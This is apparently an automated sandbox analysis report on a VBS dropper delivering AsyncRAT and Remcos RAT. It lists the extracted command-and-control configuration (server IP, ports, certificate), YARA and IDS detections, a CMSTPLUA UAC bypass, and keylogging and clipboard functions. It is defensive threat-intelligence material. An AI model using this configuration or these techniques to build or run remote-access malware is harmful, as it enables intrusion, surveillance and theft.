        Source: 2.2.wscript.exe.5ed0000.2.raw.unpackMalware Configuration Extractor: AsyncRAT {"Ports": ["6666"], "Server": ["139.99.133.66"], "Mutex": "MIGUELANGELES", "Certificate": "MIICKzCCAZSgAwIBAgIVAO5NCNVriIgVqdmZuiqdaFkGqjLvMA0GCSqGSIb3DQEBDQUAMF8xEDAOBgNVBAMMB2FzYXNhc2ExEzARBgNVBAsMCnF3cWRhbmNodW4xHDAaBgNVBAoME0RjUmF0IEJ5IHF3cWRhbmNodW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yMzA3MDQxMzM1NTVaFw0zNDA0MTIxMzM1NTVaMBAxDjAMBgNVBAMMBURjUmF0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCB82Ur6soO7/5apLmyoS9issJODa4S2r9uXXSHnwNbxCISNhPMELugVRoPjyUDUW4n1Fk01iBzGqSOwgQ9lAMbkbpzB+w9E5EpaHThe4KVOEhhL5dLGojfNgvbD3URbOIgpzRgkJf2x8wigUMRLBR1fYytIOWAbL3y9rwAXGlnxwIDAQABozIwMDAdBgNVHQ4EFgQUT1sA15K/oe8QOOxFi7To7KxJB/MwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQAZ+eiDeOgMA0GmKyVtNdthd/UbaqT49UyogROnA13GWYKSSOgs8BYLv/G/anZvkI72fR3/RF1jiSHuPwgqFetcHE6po6u5vRPho4yLVHGOPy8PtoxHiCHPOkORnHUGDTrs8HuSOkQpXyOgRXbLcVtVIbcfBFns3UKHcJ7IO0tuBA==", "Server Signature": "N3pZ2YCPJotv4dO0p9r4yZEeDnvpp9s/wXezrLSSJXN20FTY+KcXcOXJBRQV13FUX0FmBygTW0WXV3x9TGBjM7Nv//rhhRRRW37HV7bBW576W+8wt5cQpEzjMa5sPAAojC48387uRm7G9EfI2GVf5h3nL8PFY9Kvhbt1sQWDbvI="}
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\dynwrapx.dllReversingLabs: Detection: 45%
        Multi AV Scanner detection for submitted file
        Source: lmg1_Mlakaifa443456.vbsReversingLabs: Detection: 26%
        Yara detected Remcos RAT
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00433837
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_00433837
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,21_2_00433837
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,23_2_00433837
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,27_2_00433837
        Source: winhlp32.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

        Exploits

        barindex
        Yara detected UAC Bypass using CMSTP
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

        Privilege Escalation

        barindex
        Contains functionality to bypass UAC (CMSTPLUA)
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004074FD _wcslen,CoGetObject,17_2_004074FD
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004074FD _wcslen,CoGetObject,19_2_004074FD
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004074FD _wcslen,CoGetObject,21_2_004074FD
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004074FD _wcslen,CoGetObject,23_2_004074FD
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004074FD _wcslen,CoGetObject,27_2_004074FD
        Source: Binary string: C:\Users\28718\Documents\GitHub\DcRat\Binaries\Release\Plugins\SendFile.pdb source: RegAsm.exe, 00000004.00000002.3319084811.0000000005F20000.00000004.08000000.00040000.00000000.sdmp
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0044E879 FindFirstFileExA,19_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040783C FindFirstFileW,FindNextFileW,19_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,21_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,21_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0044E879 FindFirstFileExA,21_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,21_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040783C FindFirstFileW,FindNextFileW,21_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,23_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,23_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0044E879 FindFirstFileExA,23_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,23_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040783C FindFirstFileW,FindNextFileW,23_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,23_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,23_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,23_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409253
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,27_2_0041C291
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,27_2_0040C34D
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409665
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0044E879 FindFirstFileExA,27_2_0044E879
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,27_2_0040880C
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040783C FindFirstFileW,FindNextFileW,27_2_0040783C
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,27_2_00419AF5
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,27_2_0040BB30
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,27_2_0040BD37
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 139.99.133.66:6666 -> 192.168.2.5:49704
        Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49715 -> 139.99.133.66:4444
        Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 139.99.133.66:4444 -> 192.168.2.5:49715
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: 139.99.133.66
        Potential malicious VBS script found (has network functionality)
        Source: Initial file: BinaryStream.SaveToFile FILE_NAME
        Source: global trafficTCP traffic: 192.168.2.5:49704 -> 139.99.133.66:6666
        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: unknownTCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,17_2_0041B380
        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
        Source: RegAsm.exe, 00000004.00000002.3306976580.0000000001121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: RegAsm.exe, 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enqN
        Source: winhlp32.exeString found in binary or memory: http://geoplugin.net/json.gp
        Source: RegAsm.exe, 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Contains functionality to register a low level keyboard hook
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000017_2_0040A2B8
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B70E
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168C1
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_004168C1
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_004168C1
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,23_2_004168C1
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,27_2_004168C1
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B70E
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,17_2_0040A3E0

        E-Banking Fraud

        barindex
        Yara detected Remcos RAT
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
